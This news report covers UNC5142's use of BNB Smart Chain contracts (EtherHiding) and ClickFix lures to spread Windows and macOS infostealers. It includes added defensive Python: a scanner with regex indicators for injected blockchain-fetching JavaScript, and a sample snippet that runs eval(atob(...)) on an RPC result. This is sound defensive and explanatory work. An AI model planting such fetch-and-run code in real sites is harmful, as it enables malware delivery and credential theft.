UNC5142 Exploits Blockchain Technology to Distribute Information Stealers
A financially driven threat actor, identified as UNC5142, has been observed leveraging blockchain smart contracts to disseminate information-stealing malware, including variants such as Atomic (AMOS), Lumma, Rhadamanthys (also known as RADTHIEF), and Vidar, across both Windows and macOS systems.
The Google Threat Intelligence Group (GTIG) disclosed in a report to The Hacker News that UNC5142 is recognized for its exploitation of compromised WordPress websites, along with a technique called ‘EtherHiding.’ This method obscures malicious code by embedding it into a public blockchain, notably the BNB Smart Chain.
As of June 2025, Google indicated it had flagged approximately 14,000 web pages featuring injected JavaScript consistent with UNC5142’s operational tactics, underscoring the indiscriminate targeting of vulnerable WordPress sites.
However, Google noted that activity has ceased since July 23, 2025, which may indicate a strategic pause or a shift in operational methods.
EtherHiding was first documented by Guardio Labs in October 2023, in attacks that delivered malicious code via Binance Smart Chain contracts, typically through compromised sites displaying fake browser-update prompts.
A key element of these attacks is a multi-stage JavaScript downloader referred to as CLEARSHORT, which facilitates the malware’s distribution through these compromised sites.
In the initial stage, malicious JavaScript is injected into plugin and theme files, or directly into the WordPress database; it retrieves the next stage by querying a malicious smart contract on the BNB Smart Chain.
The smart contract is used to obtain a CLEARSHORT landing page from an external server; the page uses the ClickFix social-engineering technique to trick users into running malicious commands.
The commands are entered into the Windows Run dialog or the macOS Terminal app, ultimately resulting in the deployment of the stealer malware.
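The injected-JavaScript stage described above is the part a site owner can look for. The following Python scanner is an added illustration, not code from GTIG or from the campaign: it walks a dictionary of WordPress file and option contents (constructed samples here) and scores each one for indicators of a script that reads its next stage from a public BNB Smart Chain RPC endpoint. The indicator list, the RPC hostnames, the weights and the threshold are assumptions chosen for this example, not indicators published in the report.

```python
"""Static scan of WordPress files and option values for JavaScript that
reads its next stage from a public blockchain RPC (EtherHiding-style).
Added illustration; indicator list, weights and threshold are assumptions."""
import re
from dataclasses import dataclass, field

# Weighted indicators. The hostnames are public BNB Smart Chain RPC endpoints
# (assumed list for this example, not indicators from the report).
INDICATORS = [
    ("bsc_rpc_endpoint", 3,
     re.compile(r"bsc-dataseed\d*\.(?:binance|bnbchain)\.org|rpc\.ankr\.com/bsc", re.I)),
    ("json_rpc_eth_call", 3, re.compile(r"\beth_call\b")),
    ("web3_library", 2,
     re.compile(r"\b(?:web3|ethers)(?:\.min)?\.js\b|new\s+Web3\s*\(|ethers\.providers", re.I)),
    ("dynamic_code_exec", 1, re.compile(r"\beval\s*\(|new\s+Function\s*\(|\batob\s*\(")),
]
FLAG_THRESHOLD = 4  # a lone web3 library load (weight 2) is normal on a Web3 site


@dataclass
class Finding:
    location: str
    hits: list = field(default_factory=list)  # indicator names matched, in INDICATORS order
    score: int = 0
    flagged: bool = False


def scan_text(location, text):
    """Score one file or database value; each indicator counts at most once."""
    finding = Finding(location)
    for name, weight, pattern in INDICATORS:
        if pattern.search(text):
            finding.hits.append(name)
            finding.score += weight
    finding.flagged = finding.score >= FLAG_THRESHOLD
    return finding


def scan_site(contents):
    """contents: {location: text}. Returns Findings sorted by score, highest first."""
    return sorted((scan_text(k, v) for k, v in contents.items()), key=lambda f: -f.score)


# Constructed sample contents (not material from the campaign): one theme file
# that queries a chain RPC and executes what comes back, one benign plugin
# script, and one widget option that merely loads a Web3 library.
SAMPLES = {
    "wp-content/themes/demo/footer.php": """
<script>
  const rpc = "https://bsc-dataseed.binance.org/";
  fetch(rpc, {method: "POST", body: JSON.stringify({jsonrpc: "2.0", method: "eth_call",
      params: [{to: "0x0000000000000000000000000000000000000000", data: "0x00000000"}, "latest"], id: 1})})
    .then(r => r.json()).then(j => eval(atob(j.result)));
</script>
""",
    "wp-content/plugins/demo/assets/app.js":
        "document.addEventListener('DOMContentLoaded', () => console.log('ok'));",
    "wp_options:widget_text":
        "<script src='https://cdn.jsdelivr.net/npm/web3@1.10.0/dist/web3.min.js'></script>",
}

if __name__ == "__main__":
    for f in scan_site(SAMPLES):
        print(f"{'FLAG' if f.flagged else 'ok  '} score={f.score} {f.location} {f.hits}")
```

In practice the dictionary would be filled from a crawl of `wp-content` plus the `wp_options` and `wp_posts` tables, which is where the report says the injection lands; the weighting keeps a legitimate Web3-enabled site from tripping on a library load alone.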
As of December 2024, these landing pages have typically been hosted in encrypted form on a Cloudflare .dev domain.
In Windows-specific attacks, the malicious command executes an HTML Application (HTA) file downloaded from a MediaFire URL.
The HTA drops a PowerShell script designed to evade security defenses, which then fetches the encrypted payload from GitHub, MediaFire, or other infrastructure and runs the stealer entirely in memory, leaving no traces on disk.
For macOS-centric attacks observed in February and April 2025, the attackers employed ClickFix decoys. These encouraged users to run a bash command in the Terminal, which subsequently invoked a shell script that used the curl command to retrieve the Atomic Stealer payload from a remote server.
CLEARSHORT is believed to be an iteration of ClearFake, a JavaScript framework subjected to comprehensive analysis by the French cybersecurity firm Sekoia in March 2025. ClearFake has reportedly been operational since July 2023, with ClickFix tactics emerging around May 2024.
The exploitation of blockchain technology provides several advantages, allowing UNC5142 to blend seamlessly with legitimate Web3 activities while enhancing the resilience of its operations against detection and intervention.
According to Google, the threat actor’s methodologies have evolved significantly in the past year, transitioning from a singular-contract framework to a more intricate system utilizing three smart contracts starting in November 2024. This shift aims for improved operational agility, with notable refinements detected as recently as January.
This innovative architecture resembles a legitimate software development principle known as the proxy pattern, which is employed by developers to create upgradable contracts.
The setup resembles a Router-Logic-Storage architecture that assigns specific roles to each contract. This configuration permits swift modifications to critical elements of the attack, such as landing page URLs or decryption keys, without necessitating alterations to the JavaScript embedded within compromised websites. Consequently, the campaigns exhibit heightened agility and resistance to takedown efforts.

UNC5142 exploits the mutable characteristics of smart contract data—while the program code itself remains immutable after deployment—to adjust the payload URLs, incurring network fees ranging from $0.25 to $1.50 for these updates.
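The mutability this paragraph describes is also what lets a defender watch it: the value a contract's read function returns can be re-read at any block height and compared with earlier reads, so a rotation of the served URL shows up even though neither the contract code nor the JavaScript on compromised sites changed. The following Python is an added example with no code from the report: it decodes the ABI-encoded `string` that an `eth_call` returns and lists each block at which the decoded value changed. The responses and URLs are constructed, and `abi_encode_string` exists only to build them.

```python
"""Decode the ABI-encoded `string` an eth_call returns and diff successive
reads of the same contract function. Added illustration; responses below are
constructed, not data from any real contract."""


def abi_encode_string(s):
    """ABI-encode a single `string` return value: 32-byte head offset (0x20),
    32-byte byte length, then the UTF-8 data zero-padded to a 32-byte boundary.
    Used here only to build constructed eth_call responses."""
    data = s.encode("utf-8")
    padded = data + b"\x00" * (-len(data) % 32)
    return ("0x" + (32).to_bytes(32, "big").hex()
            + len(data).to_bytes(32, "big").hex() + padded.hex())


def abi_decode_string(hexstr):
    """Inverse of the above, with bounds checks so a truncated or malformed
    response raises instead of returning garbage."""
    raw = bytes.fromhex(hexstr[2:] if hexstr.startswith("0x") else hexstr)
    if len(raw) < 64:
        raise ValueError("response too short for an ABI-encoded string")
    offset = int.from_bytes(raw[:32], "big")
    if offset + 32 > len(raw):
        raise ValueError("head offset points past the response")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(raw):
        raise ValueError("declared length exceeds the response")
    return raw[start:start + length].decode("utf-8", errors="replace")


def diff_reads(history):
    """history: list of (block_number, hex_response) in block order.
    Returns [(block, previous_value, new_value)] for every change."""
    changes = []
    prev = None
    for block, resp in history:
        value = abi_decode_string(resp)
        if prev is not None and value != prev:
            changes.append((block, prev, value))
        prev = value
    return changes


# Constructed eth_call responses, as if the same contract function had been
# read at three block heights; the URLs are placeholders, not real lures.
HISTORY = [
    (45_000_000, abi_encode_string("https://lure-a.example.invalid/page")),
    (45_100_000, abi_encode_string("https://lure-a.example.invalid/page")),
    (45_200_000, abi_encode_string("https://lure-b.example.invalid/page")),
]

if __name__ == "__main__":
    for block, old, new in diff_reads(HISTORY):
        print(f"block {block}: served value changed from {old!r} to {new!r}")
```

Feeding this from a live RPC means issuing the same read-only `eth_call` the injected script issues (the contract address and function selector come from the script itself) on a schedule and appending each decoded result to the history; the cheap update fees the report cites mean rotations can be frequent, so the poll interval should be short enough to catch them.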
Further investigations revealed that the threat actor employs two distinct sets of smart contract infrastructures for deploying stealer malware via the CLEARSHORT downloader.
The Main infrastructure was established on November 24, 2024, while the Secondary infrastructure was funded on February 18, 2025.
GTIG characterized the Main infrastructure as the backbone of the campaign, highlighted by its earlier inception and consistent updates.
The Secondary infrastructure appears to serve as a tactical extension, possibly devised to accommodate spikes in activity, test new lures, or bolster operational resilience.
Given the frequent updates to the infection chain, combined with a sustained operational tempo, a wide array of compromised websites, and the diverse malware payloads distributed over the last 18 months, it is probable that UNC5142 has achieved a measure of success with its initiatives.
Source link: Thehackernews.com.